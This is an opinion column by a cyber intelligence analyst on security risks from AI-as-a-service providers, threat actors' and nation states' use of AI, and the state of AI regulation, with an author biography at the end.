Start your day with intelligence. Get The OODA Daily Pulse.

Recent reporting reveals that artificial intelligence-as-a-service (AIaaS) providers are susceptible to hostile cyber actors seeking “to escalate privileges, gaining cross-tenant access to other customers’ models, and take control over continuous integration and continuous deployment pipelines.”  As highlighted in the article, the impact could be detrimental should threat actors gain access into and potential manipulate the numerous private AI models and apps within AIaaS suppliers.  This revelation highlights the possibility of threat actor targeting and exploiting a new supply chain vector, and being able to execute a series of attacks that could further access into other networks, steal information, manipulate data, and essentially facilitate a variety of attacks depending on the threat actors’ intent.

AIaaS is another avenue where AI is quickly being incorporated into business operations.  According to an outlook report by CompTIA, among the companies surveyed, AI is viewed favorably by the private sector with 22% aggressively pursuing integration, 33% maintaining limited integration, and 45% actively exploring potential use of the technology.  Per the report, the reasons for AI integration are diverse:  several companies polled are looking to AI to improve operations; others to bolster cybersecurity and fraud management; strengthening customer relationship management, content production, accounting assistance and supply chain operations represented the majority of the respondents’ goals with AI.  AIaaS are offered by vendors for the purpose of providing organizations AI tools and capabilities thereby minimizing resource investment on the part of their customers.  Simply, these vendors fill a void, offering cost-effective AI solutions, and by doing so, expanding AI integration into smaller businesses.

The potential downside of AI has been and is continually being debated with how hostile actors can fully leverage and exploit the technology to enable hostile acts that can cause varying levels of impact.  There are increasing reports where threat actors are moving from the hypothetical to the operational with respect to leveraging AI for their cyber activities. In addition to the variety of ways automated AI and specifically generative technologies that can be used to create social engineering, write malicious code, etc., one cybersecurity company revealed a proof-of-concept tool dubbed Red Reapercapable of analyzing data and meticulously identifying sensitive information for espionage or other criminal purposes. While cybercriminal use of AI is worrisome enough, the power AI technology can generate to support a nation state is downright frightening. Notably, according to reporting from Microsoft, China has been executing influence campaigns leveraging AI-generated and AI-enhanced content creating video, memes, and audio in order to advance their strategic narratives.  Per Microsoft, it was the first time it had observed a nation state using AI to influence a foreign election and is likely only the tip of the iceberg.  Sure, AI is being implemented into defenses, but attacks instill more fear than any measure designed to stop them.

But there is a cautionary tale to be told here as well.  Much has been made with respect to the extent AI can not only revolutionize every facet of society, eventually replacing

humans in jobs, and becoming self-aware to the extent of thinking creatively independently, as demonstrated in a Go tournament in 2016 in which AlphaGo AI surprised the reigning Go master and champion beating him.  Not that this is an end-of-the-world development; far from it.  But it does demonstrate that when talking about the power and potential capability of AI technology, there is more that needs to be understood about the possibilities to benefit society and the problems that it can cause if its development is not monitored and tracked.

The U.S. Department of State commissioned a report on AI that warned that the technology could pose an “extinction-level threat,” specifically referencing the rapidly expanding capabilities, weaponization, and the high risk of losing control over the technology as catalysts for this worst case scenario.  Granted, existential threats have become common parlance of government to try to gaslight issues (e.g., climate changepolitical opponentswhite supremacy, to name a few), and the potential ramifications of unbridled rolling out of AI without a plan can certainly lead to problems.  Of paramount concern is the similarities of the technology to nuclear weapons development, calling for rigorous regulation to prevent rampant and irresponsible proliferation.

The latter point cannot be understated as the history of technological development has always put security considerations on the backburner, and as data breaches have revealed, organizations are always willing to pass-the-buck, rather than take responsibility.  Class action lawsuits are becoming more frequent in response to data breaches according to a 2024 report, although it is debatable whether this is having an influence on how companies are addressing their security.  A recent Executive Order on AI and a non-binding international agreement with 18 other countries to keep AI systems secure by design are positive acknowledgements of what needs to be done, true understanding will emerge when policy is implemented, carried out, and measured.  U.S. AI developers may follow the Executive Order, but certainly foreign companies do not, nor even strictly adhere to what has been laid out in the agreement.  These efforts risk becoming symbolic gestures more than legitimate regulation.

The U.S. government is promoting a more optimistic view of the race between defenders and attackers with respect to their use of AI.  According to FBI and DHS officials, generative AI has afforded more benefits for cybersecurity practitioners than hostile actors.  While this sounds positive, if true, it is likely that any gap between the two will quickly close, especially for the more cyber savvy state and nonstate actors who as the article states are currently “experimenting” with the technology.  I would argue that “experimenting” conveys the wrong sentiment of what these actors are doing, as they have consistently demonstrated in the past an ability to take advantage and capitalize on IT developments, knowing full well that the quicker they are able to operationalize the technology, the better positioned they will be to refine how it’s used against slower defenders.

One big takeaway is that the competition to effectively leverage AI is still formulating, and what’s happening in the current environment with respect to AI development, company responsibility, and the international community’s role in its rollout will be formative in how the race concludes.  The best part of it is that humans have a lot of say in how that happens.  At least, for now.

AI versus AI will be the central drama, but the outcome depends profoundly on human choices around how intelligently we govern this technology. 

Emilio Iasiello

About the Author

Emilio Iasiello

Emilio Iasiello has nearly 20 years’ experience as a strategic cyber intelligence analyst, supporting US government civilian and military intelligence organizations, as well as the private sector. He has delivered cyber threat presentations to domestic and international audiences and has published extensively in such peer-reviewed journals as Parameters, Journal of Strategic Security, the Georgetown Journal of International Affairs, and the Cyber Defense Review, among others. All comments and opinions expressed are solely his own.